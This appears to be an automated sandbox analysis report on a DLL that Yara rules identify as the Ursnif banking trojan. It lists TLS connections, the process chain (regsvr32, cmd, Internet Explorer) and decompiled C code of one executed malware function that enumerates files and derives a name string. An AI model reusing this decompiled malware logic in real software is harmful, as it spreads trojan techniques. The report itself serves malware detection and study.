                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.198050976 CET151.101.1.44443192.168.2.549745CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USWed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                                                                                        CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USThu Sep 24 02:00:00 CEST 2020Tue Sep 24 01:59:59 CEST 2030
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.198477983 CET151.101.1.44443192.168.2.549746CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USWed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                                                                                        CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USThu Sep 24 02:00:00 CEST 2020Tue Sep 24 01:59:59 CEST 2030
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.199105024 CET151.101.1.44443192.168.2.549744CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USWed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                                                                                        CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USThu Sep 24 02:00:00 CEST 2020Tue Sep 24 01:59:59 CEST 2030

                                                                                                                                                                                                                                        Code Manipulations

                                                                                                                                                                                                                                        Statistics

                                                                                                                                                                                                                                        CPU Usage

                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                        Memory Usage

                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                        High Level Behavior Distribution

                                                                                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                                                                                        Behavior

                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                        System Behavior

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Start time:08:05:03
                                                                                                                                                                                                                                        Start date:15/12/2020
                                                                                                                                                                                                                                        Path:C:\Windows\System32\loaddll32.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:loaddll32.exe 'C:\Users\user\Desktop\statis1c.dll'
                                                                                                                                                                                                                                        Imagebase:0x12d0000
                                                                                                                                                                                                                                        File size:120832 bytes
                                                                                                                                                                                                                                        MD5 hash:2D39D4DFDE8F7151723794029AB8A034
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:moderate

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Start time:08:05:03
                                                                                                                                                                                                                                        Start date:15/12/2020
                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:regsvr32.exe /s C:\Users\user\Desktop\statis1c.dll
                                                                                                                                                                                                                                        Imagebase:0x1130000
                                                                                                                                                                                                                                        File size:20992 bytes
                                                                                                                                                                                                                                        MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.270922495.0000000005648000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.270853129.0000000005648000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.270899623.0000000005648000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.270776978.0000000005648000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.270748296.0000000005648000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000002.603390107.0000000005648000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.270930873.0000000005648000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.270911726.0000000005648000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.270883574.0000000005648000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:high

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Start time:08:05:04
                                                                                                                                                                                                                                        Start date:15/12/2020
                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'
                                                                                                                                                                                                                                        Imagebase:0x150000
                                                                                                                                                                                                                                        File size:232960 bytes
                                                                                                                                                                                                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Start time:08:05:04
                                                                                                                                                                                                                                        Start date:15/12/2020
                                                                                                                                                                                                                                        Path:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                        Imagebase:0x7ff7493d0000
                                                                                                                                                                                                                                        File size:823560 bytes
                                                                                                                                                                                                                                        MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Start time:08:05:05
                                                                                                                                                                                                                                        Start date:15/12/2020
                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5300 CREDAT:17410 /prefetch:2
                                                                                                                                                                                                                                        Imagebase:0x1d0000
                                                                                                                                                                                                                                        File size:822536 bytes
                                                                                                                                                                                                                                        MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Start time:08:05:09
                                                                                                                                                                                                                                        Start date:15/12/2020
                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5300 CREDAT:17418 /prefetch:2
                                                                                                                                                                                                                                        Imagebase:0x7ff797770000
                                                                                                                                                                                                                                        File size:822536 bytes
                                                                                                                                                                                                                                        MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Start time:08:05:46
                                                                                                                                                                                                                                        Start date:15/12/2020
                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5300 CREDAT:82970 /prefetch:2
                                                                                                                                                                                                                                        Imagebase:0x1d0000
                                                                                                                                                                                                                                        File size:822536 bytes
                                                                                                                                                                                                                                        MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high

                                                                                                                                                                                                                                        Disassembly

                                                                                                                                                                                                                                        Code Analysis

                                                                                                                                                                                                                                        Reset < >

                                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                                          C-Code - Quality: 93%
                                                                                                                                                                                                                                          			E011232BA(signed char* __eax, intOrPtr* _a4) {
                                                                                                                                                                                                                                          				signed int _v12;
                                                                                                                                                                                                                                          				void* _v16;
                                                                                                                                                                                                                                          				CHAR* _v20;
                                                                                                                                                                                                                                          				struct _FILETIME _v28;
                                                                                                                                                                                                                                          				void* _v32;
                                                                                                                                                                                                                                          				void* _v36;
                                                                                                                                                                                                                                          				char* _v40;
                                                                                                                                                                                                                                          				signed int _v44;
                                                                                                                                                                                                                                          				long _v344;
                                                                                                                                                                                                                                          				struct _WIN32_FIND_DATAA _v368;
                                                                                                                                                                                                                                          				signed int _t72;
                                                                                                                                                                                                                                          				void* _t74;
                                                                                                                                                                                                                                          				signed int _t76;
                                                                                                                                                                                                                                          				void* _t78;
                                                                                                                                                                                                                                          				intOrPtr _t81;
                                                                                                                                                                                                                                          				CHAR* _t83;
                                                                                                                                                                                                                                          				void* _t85;
                                                                                                                                                                                                                                          				signed char _t89;
                                                                                                                                                                                                                                          				signed char _t91;
                                                                                                                                                                                                                                          				intOrPtr _t93;
                                                                                                                                                                                                                                          				void* _t96;
                                                                                                                                                                                                                                          				long _t99;
                                                                                                                                                                                                                                          				int _t101;
                                                                                                                                                                                                                                          				signed int _t109;
                                                                                                                                                                                                                                          				char* _t111;
                                                                                                                                                                                                                                          				void* _t113;
                                                                                                                                                                                                                                          				int _t119;
                                                                                                                                                                                                                                          				char _t128;
                                                                                                                                                                                                                                          				void* _t134;
                                                                                                                                                                                                                                          				signed int _t136;
                                                                                                                                                                                                                                          				char* _t139;
                                                                                                                                                                                                                                          				signed int _t140;
                                                                                                                                                                                                                                          				char* _t141;
                                                                                                                                                                                                                                          				char* _t146;
                                                                                                                                                                                                                                          				signed char* _t148;
                                                                                                                                                                                                                                          				int _t151;
                                                                                                                                                                                                                                          				void* _t152;
                                                                                                                                                                                                                                          				void* _t153;
                                                                                                                                                                                                                                          				void* _t154;
                                                                                                                                                                                                                                          				void* _t165;
                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                          				_v12 = _v12 & 0x00000000;
                                                                                                                                                                                                                                          				_t148 = __eax;
                                                                                                                                                                                                                                          				_t72 =  *0x112d2a0; // 0x59935a40
                                                                                                                                                                                                                                          				_t74 = RtlAllocateHeap( *0x112d238, 0, _t72 ^ 0x59935b44);
                                                                                                                                                                                                                                          				_v20 = _t74;
                                                                                                                                                                                                                                          				if(_t74 == 0) {
                                                                                                                                                                                                                                          					L36:
                                                                                                                                                                                                                                          					return _v12;
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				_t76 =  *0x112d2a0; // 0x59935a40
                                                                                                                                                                                                                                          				_t78 = RtlAllocateHeap( *0x112d238, 0, _t76 ^ 0x59935a4d);
                                                                                                                                                                                                                                          				_t146 = 0;
                                                                                                                                                                                                                                          				_v36 = _t78;
                                                                                                                                                                                                                                          				if(_t78 == 0) {
                                                                                                                                                                                                                                          					L35:
                                                                                                                                                                                                                                          					HeapFree( *0x112d238, _t146, _v20);
                                                                                                                                                                                                                                          					goto L36;
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				_t136 =  *0x112d2a0; // 0x59935a40
                                                                                                                                                                                                                                          				memset(_t78, 0, _t136 ^ 0x59935a4d);
                                                                                                                                                                                                                                          				_t81 =  *0x112d2a4; // 0x451a5a8
                                                                                                                                                                                                                                          				_t154 = _t153 + 0xc;
                                                                                                                                                                                                                                          				_t5 = _t81 + 0x112e7e8; // 0x73797325
                                                                                                                                                                                                                                          				_t83 = E011277E6(_t5);
                                                                                                                                                                                                                                          				_v20 = _t83;
                                                                                                                                                                                                                                          				if(_t83 == 0) {
                                                                                                                                                                                                                                          					L34:
                                                                                                                                                                                                                                          					HeapFree( *0x112d238, _t146, _v36);
                                                                                                                                                                                                                                          					goto L35;
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				_t134 = 0xffffffffffffffff;
                                                                                                                                                                                                                                          				_v28.dwLowDateTime = 0x59935a4d;
                                                                                                                                                                                                                                          				_v28.dwHighDateTime = 0x59935a4d;
                                                                                                                                                                                                                                          				_t85 = CreateFileA(_t83, 0x80000000, 1, 0, 3, 0x80, 0); // executed
                                                                                                                                                                                                                                          				_v32 = _t85;
                                                                                                                                                                                                                                          				if(_t85 != 0x59935a4d) {
                                                                                                                                                                                                                                          					GetFileTime(_t85,  &_v28, 0, 0);
                                                                                                                                                                                                                                          					_v28.dwLowDateTime = _v28.dwLowDateTime + 0x2a69c000;
                                                                                                                                                                                                                                          					asm("adc dword [ebp-0x14], 0xc9");
                                                                                                                                                                                                                                          					CloseHandle(_v32);
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				 *(StrRChrA(_v20, _t146, 0x5c)) = 0;
                                                                                                                                                                                                                                          				_t89 = 0x3c6ef35f +  *_t148 * 0x19660d;
                                                                                                                                                                                                                                          				_t91 = 0x3c6ef35f + _t89 * 0x19660d;
                                                                                                                                                                                                                                          				 *_t148 = _t91;
                                                                                                                                                                                                                                          				_v32 = _t91 & 0x000000ff;
                                                                                                                                                                                                                                          				_t93 =  *0x112d2a4; // 0x451a5a8
                                                                                                                                                                                                                                          				_t16 = _t93 + 0x112e809; // 0x642e2a5c
                                                                                                                                                                                                                                          				_v40 = _t146;
                                                                                                                                                                                                                                          				_v44 = _t89 & 0x000000ff;
                                                                                                                                                                                                                                          				__imp__(_v20, _t16);
                                                                                                                                                                                                                                          				_t96 = FindFirstFileA(_v20,  &_v368); // executed
                                                                                                                                                                                                                                          				_v16 = _t96;
                                                                                                                                                                                                                                          				if(_t96 == _t134) {
                                                                                                                                                                                                                                          					_t146 = 0;
                                                                                                                                                                                                                                          					goto L34;
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
                                                                                                                                                                                                                                          				while(_t99 > 0) {
                                                                                                                                                                                                                                          					_t101 = FindNextFileA(_v16,  &_v368); // executed
                                                                                                                                                                                                                                          					if(_t101 == 0) {
                                                                                                                                                                                                                                          						FindClose(_v16);
                                                                                                                                                                                                                                          						_v16 = FindFirstFileA(_v20,  &_v368);
                                                                                                                                                                                                                                          						_v28.dwHighDateTime = _v344;
                                                                                                                                                                                                                                          						_v28.dwLowDateTime = _v368.ftLastWriteTime.dwLowDateTime;
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          					_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				_v12 = _v12 & 0x00000000;
                                                                                                                                                                                                                                          				while(1) {
                                                                                                                                                                                                                                          					_t109 = _v44;
                                                                                                                                                                                                                                          					if(_v12 <= _t109) {
                                                                                                                                                                                                                                          						goto L15;
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          					_t140 = _v12;
                                                                                                                                                                                                                                          					if(_t140 > _v32) {
                                                                                                                                                                                                                                          						_t141 = _v36;
                                                                                                                                                                                                                                          						 *_a4 = _t141;
                                                                                                                                                                                                                                          						while(1) {
                                                                                                                                                                                                                                          							_t128 =  *_t141;
                                                                                                                                                                                                                                          							if(_t128 == 0) {
                                                                                                                                                                                                                                          								break;
                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                          							if(_t128 < 0x30) {
                                                                                                                                                                                                                                          								 *_t141 = _t128 + 0x20;
                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                          							_t141 = _t141 + 1;
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          						_v12 = 1;
                                                                                                                                                                                                                                          						FindClose(_v16); // executed
                                                                                                                                                                                                                                          						_t146 = 0;
                                                                                                                                                                                                                                          						goto L35;
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          					_t165 = _t140 - _t109;
                                                                                                                                                                                                                                          					L15:
                                                                                                                                                                                                                                          					if(_t165 == 0 || _v12 == _v32) {
                                                                                                                                                                                                                                          						_t111 = StrChrA( &(_v368.cFileName), 0x2e);
                                                                                                                                                                                                                                          						_t139 = _v40;
                                                                                                                                                                                                                                          						_t151 = _t111 -  &(_v368.cFileName);
                                                                                                                                                                                                                                          						_t113 = 0;
                                                                                                                                                                                                                                          						if(_t139 != 0) {
                                                                                                                                                                                                                                          							_t48 = _t151 - 4; // -4
                                                                                                                                                                                                                                          							_t113 = _t48;
                                                                                                                                                                                                                                          							if(_t113 > _t151) {
                                                                                                                                                                                                                                          								_t113 = 0;
                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          						if(_t151 > 4) {
                                                                                                                                                                                                                                          							_t151 = 4;
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          						memcpy(_v36 + _t139, _t152 + _t113 - 0x140, _t151);
                                                                                                                                                                                                                                          						_t154 = _t154 + 0xc;
                                                                                                                                                                                                                                          						_v40 =  &(_v40[_t151]);
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          					do {
                                                                                                                                                                                                                                          						_t119 = FindNextFileA(_v16,  &_v368); // executed
                                                                                                                                                                                                                                          						if(_t119 == 0) {
                                                                                                                                                                                                                                          							FindClose(_v16);
                                                                                                                                                                                                                                          							_v16 = FindFirstFileA(_v20,  &_v368);
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          					} while (CompareFileTime( &(_v368.ftLastWriteTime),  &_v28) > 0);
                                                                                                                                                                                                                                          					_v12 = _v12 + 1;
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          			}











































                                                                                                                                                                                                                                          0x011232c3
                                                                                                                                                                                                                                          0x011232c9
                                                                                                                                                                                                                                          0x011232cb
                                                                                                                                                                                                                                          0x011232e5
                                                                                                                                                                                                                                          0x011232e7
                                                                                                                                                                                                                                          0x011232ec
                                                                                                                                                                                                                                          0x01123561
                                                                                                                                                                                                                                          0x01123568
                                                                                                                                                                                                                                          0x01123568
                                                                                                                                                                                                                                          0x011232f2
                                                                                                                                                                                                                                          0x01123307
                                                                                                                                                                                                                                          0x01123309
                                                                                                                                                                                                                                          0x0112330b
                                                                                                                                                                                                                                          0x01123310
                                                                                                                                                                                                                                          0x01123551
                                                                                                                                                                                                                                          0x0112355b
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x0112355b
                                                                                                                                                                                                                                          0x01123316
                                                                                                                                                                                                                                          0x01123321
                                                                                                                                                                                                                                          0x01123326
                                                                                                                                                                                                                                          0x0112332b
                                                                                                                                                                                                                                          0x0112332e
                                                                                                                                                                                                                                          0x01123335
                                                                                                                                                                                                                                          0x0112333a
                                                                                                                                                                                                                                          0x0112333f
                                                                                                                                                                                                                                          0x01123541
                                                                                                                                                                                                                                          0x0112354b
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x0112354b
                                                                                                                                                                                                                                          0x01123355
                                                                                                                                                                                                                                          0x01123359
                                                                                                                                                                                                                                          0x0112335c
                                                                                                                                                                                                                                          0x0112335f
                                                                                                                                                                                                                                          0x01123365
                                                                                                                                                                                                                                          0x0112336a
                                                                                                                                                                                                                                          0x01123373
                                                                                                                                                                                                                                          0x01123379
                                                                                                                                                                                                                                          0x01123383
                                                                                                                                                                                                                                          0x0112338a
                                                                                                                                                                                                                                          0x0112338a
                                                                                                                                                                                                                                          0x0112339c
                                                                                                                                                                                                                                          0x011233a7
                                                                                                                                                                                                                                          0x011233b5
                                                                                                                                                                                                                                          0x011233ba
                                                                                                                                                                                                                                          0x011233bf
                                                                                                                                                                                                                                          0x011233c2
                                                                                                                                                                                                                                          0x011233c7
                                                                                                                                                                                                                                          0x011233d1
                                                                                                                                                                                                                                          0x011233d4
                                                                                                                                                                                                                                          0x011233d7
                                                                                                                                                                                                                                          0x011233ed
                                                                                                                                                                                                                                          0x011233ef
                                                                                                                                                                                                                                          0x011233f4
                                                                                                                                                                                                                                          0x0112353f
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x0112353f
                                                                                                                                                                                                                                          0x0112340b
                                                                                                                                                                                                                                          0x0112345c
                                                                                                                                                                                                                                          0x0112341f
                                                                                                                                                                                                                                          0x01123427
                                                                                                                                                                                                                                          0x0112342c
                                                                                                                                                                                                                                          0x0112343a
                                                                                                                                                                                                                                          0x01123443
                                                                                                                                                                                                                                          0x0112344c
                                                                                                                                                                                                                                          0x0112344c
                                                                                                                                                                                                                                          0x0112345a
                                                                                                                                                                                                                                          0x0112345a
                                                                                                                                                                                                                                          0x01123460
                                                                                                                                                                                                                                          0x01123464
                                                                                                                                                                                                                                          0x01123464
                                                                                                                                                                                                                                          0x0112346a
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x0112346c
                                                                                                                                                                                                                                          0x01123472
                                                                                                                                                                                                                                          0x01123519
                                                                                                                                                                                                                                          0x0112351c
                                                                                                                                                                                                                                          0x01123529
                                                                                                                                                                                                                                          0x01123529
                                                                                                                                                                                                                                          0x0112352d
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x01123522
                                                                                                                                                                                                                                          0x01123526
                                                                                                                                                                                                                                          0x01123526
                                                                                                                                                                                                                                          0x01123528
                                                                                                                                                                                                                                          0x01123528
                                                                                                                                                                                                                                          0x01123532
                                                                                                                                                                                                                                          0x01123539
                                                                                                                                                                                                                                          0x0112353b
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x0112353b
                                                                                                                                                                                                                                          0x01123478
                                                                                                                                                                                                                                          0x0112347a
                                                                                                                                                                                                                                          0x0112347a
                                                                                                                                                                                                                                          0x0112348d
                                                                                                                                                                                                                                          0x01123493
                                                                                                                                                                                                                                          0x0112349e
                                                                                                                                                                                                                                          0x011234a0
                                                                                                                                                                                                                                          0x011234a4
                                                                                                                                                                                                                                          0x011234a6
                                                                                                                                                                                                                                          0x011234a6
                                                                                                                                                                                                                                          0x011234ab
                                                                                                                                                                                                                                          0x011234ad
                                                                                                                                                                                                                                          0x011234ad
                                                                                                                                                                                                                                          0x011234ab
                                                                                                                                                                                                                                          0x011234b2
                                                                                                                                                                                                                                          0x011234b6
                                                                                                                                                                                                                                          0x011234b6
                                                                                                                                                                                                                                          0x011234c6
                                                                                                                                                                                                                                          0x011234cb
                                                                                                                                                                                                                                          0x011234ce
                                                                                                                                                                                                                                          0x011234ce
                                                                                                                                                                                                                                          0x011234d1
                                                                                                                                                                                                                                          0x011234db
                                                                                                                                                                                                                                          0x011234e3
                                                                                                                                                                                                                                          0x011234e8
                                                                                                                                                                                                                                          0x011234f6
                                                                                                                                                                                                                                          0x011234f6
                                                                                                                                                                                                                                          0x0112350a
                                                                                                                                                                                                                                          0x0112350e
                                                                                                                                                                                                                                          0x0112350e

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000,59935A40,00000000), ref: 011232E5
                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000,59935A40), ref: 01123307
                                                                                                                                                                                                                                          • memset.NTDLL ref: 01123321
                                                                                                                                                                                                                                            • Part of subcall function 011277E6: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,?,59935A4D,0112333A,73797325), ref: 011277F7
                                                                                                                                                                                                                                            • Part of subcall function 011277E6: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 01127811
                                                                                                                                                                                                                                          • CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 0112335F
                                                                                                                                                                                                                                          • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 01123373
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0112338A
                                                                                                                                                                                                                                          • StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 01123396
                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?,642E2A5C), ref: 011233D7
                                                                                                                                                                                                                                          • FindFirstFileA.KERNELBASE(?,?), ref: 011233ED
                                                                                                                                                                                                                                          • CompareFileTime.KERNEL32(?,?), ref: 0112340B
                                                                                                                                                                                                                                          • FindNextFileA.KERNELBASE(0112207E,?), ref: 0112341F
                                                                                                                                                                                                                                          • FindClose.KERNEL32(0112207E), ref: 0112342C
                                                                                                                                                                                                                                          • FindFirstFileA.KERNEL32(?,?), ref: 01123438
                                                                                                                                                                                                                                          • CompareFileTime.KERNEL32(?,?), ref: 0112345A
                                                                                                                                                                                                                                          • StrChrA.SHLWAPI(?,0000002E), ref: 0112348D
                                                                                                                                                                                                                                          • memcpy.NTDLL(00000000,?,00000000), ref: 011234C6
                                                                                                                                                                                                                                          • FindNextFileA.KERNELBASE(0112207E,?), ref: 011234DB
                                                                                                                                                                                                                                          • FindClose.KERNEL32(0112207E), ref: 011234E8
                                                                                                                                                                                                                                          • FindFirstFileA.KERNEL32(?,?), ref: 011234F4
                                                                                                                                                                                                                                          • CompareFileTime.KERNEL32(?,?), ref: 01123504
                                                                                                                                                                                                                                          • FindClose.KERNELBASE(0112207E), ref: 01123539
                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,73797325), ref: 0112354B
                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 0112355B
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.601524786.0000000001121000.00000020.00000001.sdmp, Offset: 01120000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601513093.0000000001120000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601557787.000000000112C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601573692.000000000112D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601594857.000000000112F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: File$Find$CloseHeapTime$CompareFirst$AllocateEnvironmentExpandFreeNextStrings$CreateHandlelstrcatmemcpymemset
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 455834338-0
                                                                                                                                                                                                                                          • Opcode ID: 3ab5b9d610631981cba52ba69541954e5ddb4dd1ef057235120fe3222887fc19
                                                                                                                                                                                                                                          • Instruction ID: bbe1395ae8ce7b69727dc79a70ba669db9775032a865a9561c78e32d10786368
